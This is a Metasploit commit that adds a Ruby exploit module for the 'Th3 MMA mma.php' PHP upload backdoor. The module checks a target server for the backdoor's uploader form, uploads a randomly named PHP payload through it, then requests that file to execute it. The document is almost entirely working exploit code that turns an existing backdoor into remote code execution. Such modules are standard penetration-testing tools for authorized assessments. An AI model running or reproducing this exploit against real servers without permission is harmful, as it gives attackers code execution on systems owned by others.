Land rapid7#6128, Th3 MMA mma.php Backdoor Arbitrary File Upload

wchen-r7 · wchen-r7 · commit 9adfd296a029 · 2015-10-26T15:26:06.000-05:00
diff --git a/modules/exploits/multi/http/mma_backdoor_upload.rb b/modules/exploits/multi/http/mma_backdoor_upload.rb
@@ -0,0 +1,111 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'nokogiri'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Th3 MMA mma.php Backdoor Arbitrary File Upload',
+      'Description'    => %q{
+        This module exploits Th3 MMA mma.php Backdoor which allows an arbitrary file upload that
+        leads to arbitrary code execution. This backdoor also echoes the Linux kernel version or
+        operating system version because of the php_uname() function.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Jay Turla <@shipcod3>',
+        ],
+      'References'     =>
+        [
+          ['URL', 'http://blog.pages.kr/1307'] # Analysis of mma.php file upload backdoor
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'Space'    => 10000,
+          'DisableNops' => true
+        },
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        =>
+        [
+          ['mma file uploader', {} ]
+        ],
+      'DisclosureDate' => 'Apr 2 2012',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI',[true, "The path of the mma.php file uploader backdoor", "/mma.php"]),
+      ],self.class) # sometimes it is under host/images/mma.php so you may want to set this one
+  end
+
+  def has_input_name?(nodes, name)
+    nodes.select { |e| e.attributes['name'].value == name }.empty? ? false : true
+  end
+
+  def check
+    uri = normalize_uri(target_uri.path)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => uri
+    })
+
+    if res
+      n = ::Nokogiri::HTML(res.body)
+      form = n.at('form[@id="uploader"]')
+      inputs = form.search('input')
+      if has_input_name?(inputs, 'file') && has_input_name?(inputs, '_upl')
+        return Exploit::CheckCode::Appears
+      end
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    uri = normalize_uri(target_uri.path)
+    payload_name = "#{rand_text_alpha(5)}.php"
+
+    print_status("#{peer} - Trying to upload #{payload_name} to mma.php Backdoor")
+
+    data = Rex::MIME::Message.new
+
+    data.add_part('Upload', nil, nil, 'form-data; name="_upl"')
+    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{payload_name}\"")
+    post_data = data.to_s
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => uri,
+      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
+      'data'   => post_data
+    })
+
+    if res
+      if res.body =~ /uplod d0n3 in SAME file/
+        print_good("#{peer} - Our payload #{payload_name} has been uploaded. Calling payload...")
+        register_files_for_cleanup(payload_name)
+      else
+        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
+      end
+    else
+      fail_with(Failure::Unknown, 'Connection Timed Out')
+    end
+
+    send_request_cgi({
+      'uri'    => normalize_uri(payload_name),
+      'method' => 'GET'
+    })
+  end
+end
